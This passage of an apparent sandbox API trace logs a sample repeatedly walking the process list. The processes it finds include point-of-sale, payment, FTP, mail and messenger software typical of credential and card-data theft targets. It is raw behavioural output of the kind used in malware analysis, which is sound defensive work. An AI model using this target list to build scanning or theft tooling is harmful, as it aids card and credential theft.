lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0167.439] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0167.442] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0167.444] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0167.446] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0167.448] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0167.450] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0167.452] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0167.454] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0167.455] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0167.457] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0167.459] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0167.461] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0167.465] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0167.466] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0167.468] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0167.470] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0167.472] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0167.474] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0167.476] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0167.478] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0167.479] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0167.482] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0167.484] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0167.485] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0167.487] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0167.489] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0167.491] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0167.494] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0167.496] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.498] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0167.501] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.506] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.508] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0167.510] CloseHandle (hObject=0x1f84) returned 1 [0167.510] Sleep (dwMilliseconds=0x64) [0167.618] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1dfc [0167.633] Process32First (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.635] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.637] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.640] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.643] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.645] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.647] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.649] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.652] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.654] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.659] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.662] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.664] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.666] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.668] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.672] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.674] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.676] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.679] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.681] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.684] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0167.686] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.688] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0167.690] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.694] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0167.697] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0167.701] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0167.703] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0167.705] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0167.707] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.710] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.712] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.714] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0167.717] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0167.719] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.721] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.723] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.725] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.727] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0167.730] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0167.732] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0167.839] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0167.842] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0167.844] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0167.846] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0167.848] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0167.850] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0167.852] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0167.854] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0167.855] Process32Next (in: hSnapshot=0x1dfc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 